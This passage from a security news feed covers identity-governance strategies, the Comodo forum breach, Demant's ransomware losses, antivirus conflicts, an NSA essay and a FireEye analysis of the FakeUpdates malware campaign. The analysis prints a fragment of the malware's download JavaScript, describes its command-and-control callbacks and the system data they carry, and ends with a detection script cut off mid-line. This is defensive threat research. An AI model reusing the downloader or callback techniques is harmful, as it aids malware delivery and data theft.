5) Take Advantage of Automated Micro-Certifications

Since the time between new provisioning and an organization’s next audit or review process can be fairly lengthy, it is important to have a set of controls that can quickly identify anomalous access, especially when that access violates an important policy, such as segregation of duties or privileged access. This can be done through the use of micro-certifications. When an access event is triggered in which an employee has new or different access and entitlements than expected, or gains access through an outside process (commonly referred to as out of band), a manager or business application owner is alerted and can immediately perform an access review tied to that risk event. This significantly reduces insider threats and also enables organizations to meet regulatory compliance, while allowing for business exceptions that might be necessary.
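As an added illustration of strategies 1, 2 and 5 (this is not code from Core Security or its products), the following Python model drives provisioning from a role catalogue on joiner/mover/leaver events, and raises a micro-certification, with any segregation-of-duties conflict flagged on it, whenever an out-of-band grant is observed that no role pre-approves. The roles, entitlement names and SoD rule are constructed sample data.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed sample role catalogue: role -> pre-approved entitlements.
# Role and entitlement names are hypothetical.
ROLES: Dict[str, Set[str]] = {
    "ap-clerk": {"erp.invoice.read", "erp.invoice.create"},
    "ap-approver": {"erp.invoice.read", "erp.invoice.approve"},
    "engineer": {"git.read", "git.write", "ci.run"},
}

# Segregation-of-duties rules: entitlement sets no single user may hold together.
SOD_RULES: List[Set[str]] = [{"erp.invoice.create", "erp.invoice.approve"}]


@dataclass
class User:
    uid: str
    manager: str
    roles: Set[str] = field(default_factory=set)
    entitlements: Set[str] = field(default_factory=set)  # what the user actually holds
    active: bool = True


@dataclass
class Review:
    """A micro-certification raised for the manager to decide on right away."""
    uid: str
    manager: str
    entitlement: str
    source: str
    sod_conflicts: List[str]


class Governance:
    def __init__(self) -> None:
        self.users: Dict[str, User] = {}
        self.audit: List[str] = []       # append-only trail of every grant and revoke
        self.reviews: List[Review] = []  # micro-certifications awaiting a decision

    @staticmethod
    def expected(user: User) -> Set[str]:
        """Entitlements the user's roles pre-approve; nothing once the user has left."""
        if not user.active:
            return set()
        return set().union(*(ROLES[r] for r in user.roles))

    @staticmethod
    def sod_conflicts(entitlements: Set[str]) -> List[str]:
        """Names of the SoD rules that the given entitlement set violates."""
        return [" + ".join(sorted(rule)) for rule in SOD_RULES if rule <= entitlements]

    def _reconcile(self, user: User, event: str) -> None:
        """Bring actual access in line with the role model after a lifecycle event."""
        target = self.expected(user)
        for ent in sorted(user.entitlements - target):
            user.entitlements.discard(ent)
            self.audit.append(f"{event}: revoke {ent} from {user.uid}")
        for ent in sorted(target - user.entitlements):
            user.entitlements.add(ent)
            self.audit.append(f"{event}: grant {ent} to {user.uid}")

    # Joiner / mover / leaver events drive provisioning automatically.
    def join(self, uid: str, manager: str, roles: List[str]) -> User:
        user = self.users[uid] = User(uid, manager, set(roles))
        self._reconcile(user, "join")
        return user

    def move(self, uid: str, roles: List[str], manager: Optional[str] = None) -> User:
        user = self.users[uid]
        user.roles = set(roles)
        user.manager = manager or user.manager
        self._reconcile(user, "move")   # old-role access is revoked, not accumulated
        return user

    def leave(self, uid: str) -> User:
        user = self.users[uid]
        user.active = False
        self._reconcile(user, "leave")  # every entitlement, out-of-band ones included, goes
        return user

    # Access granted outside the portal (e.g. directly in an application's admin
    # console) is recorded and, when no role pre-approves it, certified at once.
    def observe_grant(self, uid: str, entitlement: str, source: str) -> Optional[Review]:
        user = self.users[uid]
        user.entitlements.add(entitlement)
        self.audit.append(f"{source}: grant {entitlement} to {uid} (out of band)")
        if entitlement in self.expected(user):
            return None                 # role-covered: nothing to certify
        review = Review(uid, user.manager, entitlement, source,
                        self.sod_conflicts(user.entitlements))
        self.reviews.append(review)
        return review

    def decide(self, review: Review, approve: bool) -> None:
        """Manager decision on a micro-certification; rejection revokes immediately."""
        if not approve:
            self.users[review.uid].entitlements.discard(review.entitlement)
            self.audit.append(f"review: revoke {review.entitlement} from {review.uid}")
        self.reviews.remove(review)
```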

6) Enforce Strong Password Policies

Few employees today remember to change the passwords they were originally issued, so it is important to have frequent mandatory password resets. It is also important to maintain password policies that enforce complexity and non-reuse rules. However, the problem with these resets is that employees may forget their updated passwords, requiring additional IT resources to support a reset. That is why it’s important to have a strong self-service password solution that enables users to securely reset passwords on their own. Leading password reset solutions also allow users to unlock their accounts through self-service mechanisms. A variety of password reset options, such as a mobile reset application, telephone-based keypad resets, a Windows Credential Provider and voice biometrics, help increase user adoption rates while maintaining a secure reset channel. This frees up helpdesk time and allows IT teams to work on more strategic initiatives.

The Real Impact of Intelligent Identity Governance on Security and User Efficiency

When organizations effectively leverage an intelligent identity governance and administration program using these six strategies, they will ultimately gain greater balance between improving organizational security and enhancing individual productivity. From automating and centralizing access approvals to meeting ever-increasing auditor demands, leading-edge IGA solutions from Core Security empower companies—even those restricted by limited resources—to become more secure and more efficient, and to gain confidence that the right people have the right access levels to the right systems at the right time.

Are you ready to strike the right balance between security and efficiency in your organization?

Get a live demo of our IGA solutions from one of our experts today.

Sophos Managed Threat Response: An evolved approach to proactive security protection

In its 2019 market guide for managed detection and response (MDR) services, Gartner forecasted that by 2024, 25% of organizations will be using MDR services, up from less than 5% today. While the percentage might not end up as high as that, there’s no doubt that the demand for these services will increase rapidly, fueled by organizations’ inability to acquire, train and retain cybersecurity talent and to keep pace with the rising sophistication and complexity … More

The post Sophos Managed Threat Response: An evolved approach to proactive security protection appeared first on Help Net Security.

Hackers breached one of Comodo Forums, 245,000 users impacted

The ITarian Forum, the Comodo discussion board and support forums, has been hacked and data belonging to nearly 245,000 registered users was exposed.

Hackers breached the ITarian Forum, the Comodo discussion board and support forums, accessing login credentials of nearly 245,000 users registered with the Comodo Forums websites. Comodo has not specified which of its two forums has been hacked. Exposed data include login username, name, email address, hashed passwords, last IP address used to access the forums, and some social media usernames for a limited number of users.

“Very recently a new vulnerability in the vBulletin software, which is one of the most popular server applications for website comments including the Comodo Forums, was made public.” reads the security notice published by Comodo. “Over the weekend at 4:57 am ET on Sunday September 29, 2019, we became aware that this security flaw in the vBulletin software had become exploited resulting in a potential data breach on the Comodo Forums.

“Our IT infrastructure team immediately took steps to mitigate the exploit by taking the forums offline and applying the recommended patches.”


Comodo attempted to reassure its forum users saying that its staff immediately took the forums offline to apply the necessary countermeasures.

The attackers exploited the recently disclosed zero-day vulnerability in vBulletin (CVE-2019-16759).

The hack of the Comodo forum took place on September 29, a few days after the vBulletin developers had released a patch to address the flaw, which means that for some reason Comodo’s administrators had not yet applied it.

vBulletin is one of the most popular forum software packages, so the disclosure of a zero-day flaw affecting it could impact a wide audience. More than 100,000 websites run on top of vBulletin.

On September 24, an anonymous hacker disclosed technical details and proof-of-concept exploit code for a critical zero-day remote code execution flaw in vBulletin.

Two days later, security expert Troy Mursch of Bad Packets observed a botnet using the recently disclosed vBulletin exploit to take over vulnerable servers and then secure them, so that they could not be compromised by other threat actors. This technique is not new; it lets the operators keep the hijacked servers for their own botnet.

Currently, Comodo operates two forums, “forums.comodo.com,” and ITarian Forum hosted at “forum.itarian.com,” the former runs on the Simple Machines Forum software, while the latter is based on vBulletin.

For this reason, hackers likely breached the ITarian Forum that is used as a discussion board for its customers searching for technical information and assistance.

“As a precautionary measure we recommend that forum users should immediately change their passwords and exercise good password practices such as strong random passwords and not share your passwords across different Internet accounts.” recommends Comodo. “The account passwords were encrypted in vBulletin for the Comodo Forum users, but a password change is recommended as part of good password practices.”

“We deeply regret any inconvenience or distress this vulnerability may have caused you, our users,” the company says.

Pierluigi Paganini

(SecurityAffairs – vBulletin, data breach)

The post Hackers breached one of Comodo Forums, 245,000 users impacted appeared first on Security Affairs.

Danish company Demant expects to suffer huge losses due to cyber attack

Danish hearing health care company Demant has estimated it will lose between $80 and $95 million due to a recent “cyber-crime” attack. Though the company has yet to share details about the “IT infrastructure incident”, it is widely believed to be the work of ransomware-wielding attackers. What is known? The attack started on September 2 and, apparently, the company quickly decided to shut down IT systems across multiple sites and business units: Still, the reaction … More

The post Danish company Demant expects to suffer huge losses due to cyber attack appeared first on Help Net Security.

Why MSPs Should Expect No-Conflict Endpoint Security


“Antivirus programs use techniques to stop viruses that are very “virus-like” in and of themselves, and in most cases if you try to run two antivirus programs, or full security suites, each believes the other is malicious and they then engage in a battle to the death (of system usability, anyway).”

“…running 2 AV’s will most likely cause conflicts and slowness as they will scan each other’s malware signature database. So it’s not recommended.”

The above quotes come from top answers on a popular computer help site and community forum in response to a question about “Running Two AVs” simultaneously.

Seattle Times tech columnist Patrick Marshall has similarly warned his readers about the dangers of antivirus products conflicting on his own computers.


Historically, these comments were spot-on, 100% correct in describing how competing AV solutions interacted on endpoints. Here’s why.

The (Traditional) Issues with Running Side-by-Side AV Programs

In pursuit of battling it out on your machine for security supremacy, AV solutions have traditionally had a tendency to cause serious performance issues.

This is because:

  • Each is convinced the other is an imposter. Antivirus programs tend to look a lot like viruses to other antivirus programs. The behaviors they engage in, like scanning files or scripts and exporting information about those data objects, can look a little shady to a program whose sole purpose is to be on the lookout for suspicious activity.
  • Each wants to be the anti-malware star. Ideally both AV programs installed on a machine would be up to the task of spotting a virus on a computer. And both would want to let the user know when they’d found something. So while AV number one may isolate a threat, you can bet AV number two will still want to alert the user to its presence. This can lead to an endlessly annoying cycle of warnings, all-clears, and further warnings.
  • Both are hungry for your computer’s limited resources. Traditional antivirus products store static lists of known threats on each user’s machine so they can be checked against new data. This, plus the memory used for storing the endpoint agent, CPU for scheduled scans, on-demand scans, and even resource use during idling can add up to big demand. Multiply it by two and devices quickly become sluggish.

Putting the Problem Into Context

Those of you reading this may be thinking, But is all of this really a problem? Who wants to run duplicate endpoint security products anyway?

Consider a scenario, one in which you’re unhappy with your current AV solution. Maybe the management overhead is unreasonable and it’s keeping you from core business responsibilities. Then what?

“Rip and replace”—a phrase guaranteed to make many an MSP shudder—comes to mind. It suggests long evenings of after-hours work removing endpoint protection from device after device, exposing each of the machines under your care to a precarious period of no protection. For MSPs managing hundreds or thousands of endpoints, even significant performance issues can seem not worth the trouble.

Hence we’ve arrived at the problem with conflicting AV software: it locks MSPs into a no-win quagmire of poor performance on the one hand, and a potentially dangerous rip-and-replace operation on the other.

But by designing a no-conflict agent, these growing pains can be eased almost completely. MSPs unhappy with the performance of their current AV can install its replacement during working hours without breaking a sweat. A cloud-based malware prevention architecture and “next-gen” approach to mitigating attacks allows everyone to benefit from the ability to change and upgrade their endpoint security with minimal effort.

Simply wait for your new endpoint agent to be installed, uninstall its predecessor, and still be home in time for dinner.

Stop Wishing and Expect No-Conflict Endpoint Protection

Any modern endpoint protection worth its salt or designed with the user in mind has two key qualities that address this problem:

  1. It won’t conflict with other AV programs and
  2. It installs fast and painlessly.

After all, this is 2019 (and over 30 years since antivirus was invented) so you should expect as much. Considering the plethora of (often so-called) next-gen endpoint solutions out there, there’s just no reason to get locked into a bad relationship you can’t easily replace if something better comes along.

So when evaluating a new cybersecurity tool, ask whether it’s no conflict and how quickly it installs. You’ll be glad you did.

The post Why MSPs Should Expect No-Conflict Endpoint Security appeared first on Webroot Blog.

NSA on the Future of National Cybersecurity

Glenn Gerstell, the General Counsel of the NSA, wrote a long and interesting op-ed for the New York Times where he outlined a long list of cyber risks facing the US.

There are four key implications of this revolution that policymakers in the national security sector will need to address:

The first is that the unprecedented scale and pace of technological change will outstrip our ability to effectively adapt to it. Second, we will be in a world of ceaseless and pervasive cyberinsecurity and cyberconflict against nation-states, businesses and individuals. Third, the flood of data about human and machine activity will put such extraordinary economic and political power in the hands of the private sector that it will transform the fundamental relationship, at least in the Western world, between government and the private sector. Finally, and perhaps most ominously, the digital revolution has the potential for a pernicious effect on the very legitimacy and thus stability of our governmental and societal structures.

He then goes on to explain these four implications. It's all interesting, and it's the sort of stuff you don't generally hear from the NSA. He talks about technological changes causing social changes, and the need for people who understand that. (Hooray for public-interest technologists.) He talks about national security infrastructure in private hands, at least in the US. He talks about a massive geopolitical restructuring -- a fundamental change in the relationship between private tech corporations and government. He talks about recalibrating the Fourth Amendment (of course).

The essay is more about the problems than the solutions, but there is a bit at the end:

The first imperative is that our national security agencies must quickly accept this forthcoming reality and embrace the need for significant changes to address these challenges. This will have to be done in short order, since the digital revolution's pace will soon outstrip our ability to deal with it, and it will have to be done at a time when our national security agencies are confronted with complex new geopolitical threats.

Much of what needs to be done is easy to see -- developing the requisite new technologies and attracting and retaining the expertise needed for that forthcoming reality. What is difficult is executing the solution to those challenges, most notably including whether our nation has the resources and political will to effect that solution. The roughly $60 billion our nation spends annually on the intelligence community might have to be significantly increased during a time of intense competition over the federal budget. Even if the amount is indeed so increased, spending additional vast sums to meet the challenges in an effective way will be a daunting undertaking. Fortunately, the same digital revolution that presents these novel challenges also sometimes provides the new tools (A.I., for example) to deal with them.

The second imperative is we must adapt to the unavoidable conclusion that the fundamental relationship between government and the private sector will be greatly altered. The national security agencies must have a vital role in reshaping that balance if they are to succeed in their mission to protect our democracy and keep our citizens safe. While there will be good reasons to increase the resources devoted to the intelligence community, other factors will suggest that an increasing portion of the mission should be handled by the private sector. In short, addressing the challenges will not necessarily mean that the national security sector will become massively large, with the associated risks of inefficiency, insufficient coordination and excessively intrusive surveillance and data retention.

A smarter approach would be to recognize that as the capabilities of the private sector increase, the scope of activities of the national security agencies could become significantly more focused, undertaking only those activities in which government either has a recognized advantage or must be the only actor. A greater burden would then be borne by the private sector.

It's an extraordinary essay, less for its contents and more for the speaker. This is not the sort of thing the NSA publishes. The NSA doesn't opine on broad technological trends and their social implications. It doesn't publicly try to predict the future. It doesn't philosophize for 6000 unclassified words. And, given how hard it would be to get something like this approved for public release, I am left to wonder what the purpose of the essay is. Is the NSA trying to lay the groundwork for some policy initiative? Some legislation? A budget request? What?

Charlie Warzel has a snarky response. His conclusion about the purpose:

He argues that the piece "is not in the spirit of forecasting doom, but rather to sound an alarm." Translated: Congress, wake up. Pay attention. We've seen the future and it is a sweaty, pulsing cyber night terror. So please give us money (the word "money" doesn't appear in the text, but the word "resources" appears eight times and "investment" shows up 11 times).

Susan Landau has a more considered response, which is well worth reading. She calls the essay a proposal for a moonshot (which is another way of saying "they want money"). And she has some important pushbacks on the specifics.

I don't expect the general counsel and I will agree on what the answers to these questions should be. But I strongly concur on the importance of the questions and that the United States does not have time to waste in responding to them. And I thank him for raising these issues in so public a way.

I agree with Landau.

Slashdot thread.

Comodo Forums Hack Exposes 245,000 Users’ Data — Recent vBulletin 0-day Used

If you have an account with the Comodo discussion board and support forums, also known as ITarian Forum, you should change your password immediately. Cybersecurity company Comodo has become one of the major victims of a recently disclosed vBulletin 0-day vulnerability, exposing login account information of nearly 245,000 users registered with the Comodo Forums websites. In a brief

Danish company Demant expects to incur losses of up to $95 million after cyber attack

Demant, a leading international hearing health care company, expects to incur losses of up to $95 million following a ransomware attack.

Last month, Demant suffered a cyber attack that caused serious problems for its operations. The company has yet to fully recover, a circumstance that suggests it was hit by ransomware.

Demant expects to incur losses of up to $95 million following the incident, a figure that already includes a deduction of $14.6 million for expected insurance coverage.

That puts the incident among the largest losses ever caused by a cyber attack.

“The cyber-crime has had a significant impact on our ability to generate the growth we expected for the second half-year, and even though our commercial operations are doing their utmost to make up for the impact of the incident, we are in a situation where we cannot execute on our ambitious commercial growth activities to the planned extent. We are working around the clock to return to our growth-oriented business focus, while minimising the impact on customers and users of our products. We are grateful for the patience and loyalty shown, and the Demant organisation will continue to approach the incident with extreme dedication until we are completely recovered and have re-established what was severely disrupted by the incident,” says Søren Nielsen, President & CEO of Demant.

On September 3, Demant was forced to shut down its entire internal IT infrastructure following an act of “cyber-crime,” but the firm did not confirm a ransomware incident.

“As previously communicated in Company announcements on 3, 4 and 17 September, the Demant Group experienced a critical incident on our internal IT infrastructure on 3 September 2019. The Group’s IT infrastructure was hit by cyber-crime.” reads a message sent by the company to the investors.

“Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution.”

The company published a statement that confirmed that a large portion of its infrastructure was impacted.

“It remains unclear whether it was a hacker attack that caused a critical crash in the IT infrastructure of the Danish company Demant on Tuesday evening.” reported Computerworld.

“But there are many indications that it could be a ransomware attack that has hit the company, according to security expert Jens Monrad, who is a daily employee of IT security firm FireEye.”

The company reported “delays in the supply of products as well as an impact on our ability to receive orders.” The incident impacted production lines in Poland as well as production in Mexico.

Many clinics across Demant’s network have not been able to provide their regular service to end-users.

The impact is predominantly related to estimated lost sales and to lost growth momentum.

“Approximately half of the estimated lost sales relates to our hearing aid wholesale business. The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” concludes Demant.

“A little less than half of the estimated lost sales relates to our retail business where a significant number of clinics have been unable to service end-users in a regular fashion. We estimate that our retail business will see the biggest impact in Australia, the US and Canada followed by the UK. The vast majority of our clinics are now fully operational, however, due to the effect of the incident on our ability to generate new appointments during September, we expect some lost sales in the next one or two months, which is also included in the current estimate.”

The incident is important because it demonstrates the potential impact of a cyber attack on organizations and urges them to adopt the necessary countermeasures.

The massive NotPetya ransomware attack caused billions of dollars in losses to organizations worldwide; the shipping giant Maersk and courier service FedEx each incurred over $300 million. In April, the aluminum producer Norsk Hydro estimated the cost of the massive cyber attack that hit the company in March at around $50 million.

Pierluigi Paganini

(SecurityAffairs – Demant, ransomware)

The post Danish company Demant expects to incur losses of up to $95 million after cyber attack appeared first on Security Affairs.

Carbon Black: Defense Capabilities Match Increased Attack Sophistication


While businesses are seeing an increase in attack sophistication, and the overall attack volume in the past 12 months has increased, defense is getting better.

According to research by Carbon Black of 250 British CTOs and CISOs, 84% of UK businesses reported an increase in overall attack volume while 90% cited more sophistication.

Speaking to Infosecurity, Rick McElroy, head of security strategy at Carbon Black, said that these statistics were due to what he called the “trickle down cyber-economy for adversaries” where nation state actors, cyber-militias and contractors working for them develop multi-million dollar tools which get into the wild – such as the exploits which enabled WannaCry and NotPetya to spread.

“As new capabilities and ammunition are developed, you’ll see that move into things like ransomware,” he explained. “Secondary, [offense] is not a highly specialized skill anymore, a lot of people are trained in it, and you can buy a lot of capabilities on the dark web. So the rise is down to more people being involved, and the sophistication is down to the cyber-economy, but defenders do have better tools.”

On that point, McElroy said that because there is better tooling in prevention and detection, the adversary has to improve and become more “stealthy.”

Asked if the state of cybersecurity was improving for defenders, McElroy said he believed it was getting better as “people are starting to sleep a bit more” and getting some of the things that they need thanks to budget approval. “It comes back to how to make the army bigger, and recruit successfully as people look at ‘non-traditional areas’,” he said.

The research found that 76% of UK organizations were more confident in their ability to repel cyber-attacks than they were 12 months ago.

McElroy said: “As the cyber-defense sector continues to mature, businesses are becoming more aware of the tools at their disposal and the tactics they can use to combat cyber-attacks. We believe this growing confidence is indicative of a power shift in favor of defenders, who are taking a more proactive approach to hunting out and neutralizing threats than previously.”

He praised the MITRE ATT&CK framework as enabling defenders as it made vendors improve their technology, and pointed out that there is a feeling that defenders have better tools than ever before “which is definitely increasing the confidence that they have” as things can be found in environments that otherwise would not have been known about.

The research also found that 90% of UK businesses said threat hunting has improved their defenses, and McElroy noted that there is less reliance on alerting, and this has had a positive impact, “but where do you find the threat hunters as this is a skill that has not been around for long and globally there is a massive shortage of threat hunters and incident responders.”

Danish Firm Says Costs of Apparent Ransomware Attack Could Reach $95M

A Danish company revealed that the costs associated with what appears to be a ransomware attack could reach as much as $95 million. Demant, a Danish manufacturer of hearing aids, suffered a “critical incident” that affected its IT infrastructure on 3 September. The company’s IT team responded by shutting down multiple systems across multiple locations […]… Read More

The post Danish Firm Says Costs of Apparent Ransomware Attack Could Reach $95M appeared first on The State of Security.

Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping

Cequence Security’s CQ Prime Threat Research Team discovered a vulnerability in the Cisco Webex and Zoom video conferencing platforms that potentially allows an attacker to enumerate (list) and view active meetings that are not protected. The web conferencing market includes nearly three dozen vendors, some of whom may use similar meeting identification techniques. Although the CQ Prime team did not test each of these products, it is possible they could be susceptible as well. … More

The post Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping appeared first on Help Net Security.

Hearing Aid Giant Warns of $95m in Ransomware Losses


A Danish firm has revealed that a suspected ransomware attack on its IT systems last month may end up costing as much as $95m.

Demant, which is one of the world’s leading makers of hearing aids, said it experienced a “critical incident” on September 3. Although it refuses to clarify the nature of the incident, local reports were less circumspect.

Although the firm had backed up data, the sheer scale of the attack appears to have had a major impact on its recovery.

“The Group’s IT infrastructure was hit by cybercrime. Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution,” Demant admitted in an update late last week.

“We continue ramping up to accommodate the back-log built up since the incident, to rebuild necessary inventories across the supply chain and to reduce turnaround times of repair and custom-made hearing aids. We are still in the recovery and ramp-up phase at our amplifier production site in Denmark and at our cochlear implants production site in France.”

The cumulative effect of these outages will have a negative financial impact on the firm in the region of DKK 550-650m ($80-95m). This includes a DKK 100 ($15m) deduction thanks to the firm’s cyber insurance policy.

Demant expects DKK 50m ($7m) to be incurred due to direct losses.

The firm’s hearing wholesale business was particularly badly affected, accounting for around half of estimated lost sales.

“The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” it continued.

“Despite our efforts to operate the business in the best possible way, our immediate focus on supporting existing customers to prevent them from being impacted by the incident has impacted sales and will likely impact our organic growth rate throughout the rest of the year.”

The news is another cautionary tale for firms currently unprepared to deal with the ransomware epidemic that continues to spread across the globe. Norwegian aluminium giant Norsk Hydro was hit earlier this year, leading to losses in the tens of millions of dollars.

Head Fake: Tackling Disruptive Ransomware Attacks

Within the past several months, FireEye has observed financially-motivated threat actors employ tactics that focus on disrupting business processes by deploying ransomware en masse throughout a victim’s environment. Because normal business processes are critical to organizational success, these ransomware campaigns have been accompanied by multi-million dollar ransom demands. In this post, we’ll provide a technical examination of one recent campaign that stems back to a technique we initially reported on in April 2018.

Between May and September 2019, FireEye responded to multiple incidents involving a financially-motivated threat actor who leveraged compromised web infrastructure to establish an initial foothold in victim environments. This activity showed consistencies with a fake browser update campaign first identified in April 2018 – now tracked by FireEye as FakeUpdates. In this newer campaign, the threat actors leveraged victim systems to deploy malware such as Dridex or NetSupport, and multiple post-exploitation frameworks. The threat actors’ ultimate goal in some cases was to ransom systems en masse with BitPaymer or DoppelPaymer ransomware (see Figure 1).


Figure 1: Recent FakeUpdates infection chain

Due to campaign proliferation, we have responded to this activity at both Managed Defense customers and incident response investigations performed by Mandiant. Through Managed Defense network and host monitoring as well as Mandiant’s incident response findings, we observed the routes the threat actor took, the extent of the breaches, and exposure of their various toolkits.

Knock, Knock: FakeUpdates are Back!

In April 2018, FireEye identified a campaign that used compromised websites to deliver heavily obfuscated Trojan droppers masquerading as Chrome, Internet Explorer, Opera, and/or Firefox browser updates. The compromised sites contained code injected directly into the HTML, or into JavaScript components rendered by the pages. Victim users reached these sites either via HTTP redirects or through watering-hole techniques employed by the attackers.

Since our April 2018 blog post, this campaign has been refined to include new techniques and the use of post-exploitation toolkits. Recent investigations have shown threat actor activity that included internal reconnaissance, credential harvesting, privilege escalation, lateral movement, and ransomware deployment in enterprise networks. FireEye has identified that a large number of the compromised sites serving up the first stage of FakeUpdates have been older, vulnerable Content Management System (CMS) applications.

You Are Using an Older Version…of our Malware

The FakeUpdates campaign begins with a rather intricate sequence of browser validation, performed before the final payload is downloaded. Injected code on the initial compromised page makes the user’s browser transparently navigate to a malicious website using hard-coded parameters. After victim browser information is gleaned, additional redirects are performed and the user is prompted to download a fake browser update. FireEye has observed that the browser validation sequence may include additional protections to evade sandbox detection and post-incident triage attempts on the compromised site(s).


Figure 2: Example of FakeUpdate landing page after HTTP redirects

The redirect process used numerous subdomains, with a limited number of IP addresses. The malicious subdomains are often changed in different parts of the initial redirects and browser validation stages.

After clicking the ‘Update’ button, we observed the downloading of one of three types of files:

  • Heavily-obfuscated HTML applications (.hta file extensions)
  • JavaScript files (.js file extensions)
  • ZIP-compressed JavaScript files (.zip extensions)

Figure 3 provides a snippet of JavaScript that provides the initial download functionality.

var domain = '//gnf6.ruscacademy[.]in/';
var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
var statTypeParamName = 'st';

var filename = 'download.hta';
var browser = 'Chrome';
var special = '1';   
var filePlain = window.atob(file64);
var a = document.getElementById('buttonDownload');

Figure 3: Excerpts of JavaScript code identified from the FakeUpdates landing pages

When the user opens the initial FakeUpdates downloader, the Windows Scripting Host (wscript.exe) is executed and the following actions are performed:

  1. A script is executed in memory and used to fingerprint the affected system.
  2. A subsequent backdoor or banking trojan is downloaded if the system is successfully fingerprinted.
  3. A script is executed in memory which:
    • Downloads and launches a third party screenshot utility.
    • Sends the captured screenshots to an attacker.
  4. The payload delivered in step 2 is subsequently executed by the script process.

The backdoor and banking-trojan payloads described above have been identified as Dridex, NetSupport Manager RAT, AZOrult, and Chthonic malware. The strategy behind the selective payload delivery is unclear; however, the most prevalent malware delivered during this phase of the infection chain were variants of the Dridex backdoor.

FakeUpdates: More like FakeHTTP

After the end user executes the FakeUpdates download, the victim system will send a custom HTTP POST request to a hard-coded Command and Control (C2) server. The POST request, depicted in Figure 4, showed that the threat actors used a custom HTTP request for initial callback. The Age HTTP header, for example, was set to a string of 16 seemingly-random lowercase hexadecimal characters.


Figure 4: Initial HTTP communication after successful execution of the FakeUpdates dropper

The HTTP Age header typically represents the time in seconds since an object has been cached by a proxy. In this case, via analysis of the obfuscated code on disk, FireEye identified that the Age header correlates to a scripted “auth header” parameter; likely used by the C2 server to validate the request. The first HTTP POST request also contains an XOR-encoded HTTP payload variable “a=”.

The C2 server responds to the initial HTTP request with encoded JavaScript. When the code is decoded and subsequently executed, system and user information is collected using wscript.exe. The information collected from the victim system included:

  • The malicious script that initialized the callback
  • System hostname
  • Current user account
  • Active Directory domain
  • Hardware details, such as manufacturer
  • Anti-virus software details
  • Running processes

This activity is nearly identical to the steps observed in our April 2018 post, indicating only minor changes in data collection during this stage. For example, in the earlier iteration of this campaign, we did not observe the collection of the script responsible for the C2 communication. Following the system information gathering, the data is XOR-encoded and sent via another custom HTTP POST request to the same C2 server, with the data included in the parameter “b=”. Figure 5 provides a snippet of the second HTTP request.


Figure 5: Second HTTP POST request after successful system information gathering

Figure 6 provides a copy of the decoded content, showing the various data points the malware transmitted back to the C2 server.

0=500
1=C:\Users\User\AppData\Local\Temp\Chrome.js
2=AMD64
3=SYSTEM1
4=User
5=4
6=Windows_NT
7=DOMAIN
8=HP
9=HP EliteDesk
10=BIOS_VERSION
11=Windows Defender|Vendor Anti-Virus
12=Vendor Anti-Virus|Windows Defender|
13=00:00:00:00:00:00
14=Enhanced (101- or 102-key)
15=USB Input Device
16=1024x768
17=System Idle Process|System|smss.exe|csrss.exe|wininit.exe|csrss.exe| winlogon.exe|services.exe|lsass.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|
svchost.exe|spoolsv.exe|svchost.exe|svchost.exe|HPLaserJetService.exe|conhost.exe…

Figure 6: Decoded system information gathered by the FakeUpdates malware
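As an added defensive example (not FireEye’s code or signatures), the following Python classifies raw HTTP requests by the callback shape described above: a POST whose Age header is a 16-character lowercase hex token rather than a cache age, with a body that is a single “a=” or “b=” parameter. The host names, hex token and body blobs in the samples are constructed, and the rules are assumptions drawn from this description only.

```python
import re
from typing import Dict, Optional, Tuple

# Constructed rules based on the callback shape described above: a POST whose
# Age header (normally an integer count of cached seconds) is a 16-character
# lowercase hex token, with a body that is one XOR-encoded parameter:
# "a=" on the first callback, "b=" on the system-information callback.
AGE_AUTH_TOKEN = re.compile(r"^[0-9a-f]{16}$")
STAGED_BODY = re.compile(r"^(?P<stage>[ab])=(?P<blob>[A-Za-z0-9+/%_.=-]{8,})$")
STAGE_NAMES = {"a": "fakeupdates-initial-callback", "b": "fakeupdates-sysinfo-callback"}


def parse_raw_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify_request(method: str, headers: Dict[str, str], body: str) -> Optional[str]:
    """Return a detection name if the request has the FakeUpdates callback
    shape, or None for ordinary traffic."""
    if method.upper() != "POST":
        return None
    age = headers.get("age")
    if age is None or age.isdigit():
        return None          # absent or an ordinary cache age: nothing to see
    if not AGE_AUTH_TOKEN.match(age):
        return None          # some other malformed value; out of scope here
    m = STAGED_BODY.match(body.strip())
    if m is None:
        # A hex "auth" token in Age is odd by itself; flag at lower confidence.
        return "suspicious-age-header"
    return STAGE_NAMES[m.group("stage")]


def classify_raw(raw: str) -> Optional[str]:
    method, _path, headers, body = parse_raw_request(raw)
    return classify_request(method, headers, body)


# Constructed sample traffic (not captured data): the token, host and blob are made up.
SAMPLE_STAGE1 = (
    "POST /news.php HTTP/1.1\r\n"
    "Host: c2.example.invalid\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Age: 3f9a0c1d2e4b5a67\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "a=UXhZVmFzbG9hZHNjcmlwdA=="
)
SAMPLE_STAGE2 = SAMPLE_STAGE1.replace("\r\na=", "\r\nb=")
SAMPLE_BENIGN_GET = "GET /index.html HTTP/1.1\r\nHost: www.example.invalid\r\nAge: 120\r\n\r\n"
SAMPLE_BENIGN_POST = (
    "POST /submit HTTP/1.1\r\n"
    "Host: www.example.invalid\r\n"
    "Age: 0\r\n"
    "\r\n"
    "a=1&b=2"
)

if __name__ == "__main__":
    for label, raw in [("stage1", SAMPLE_STAGE1), ("stage2", SAMPLE_STAGE2),
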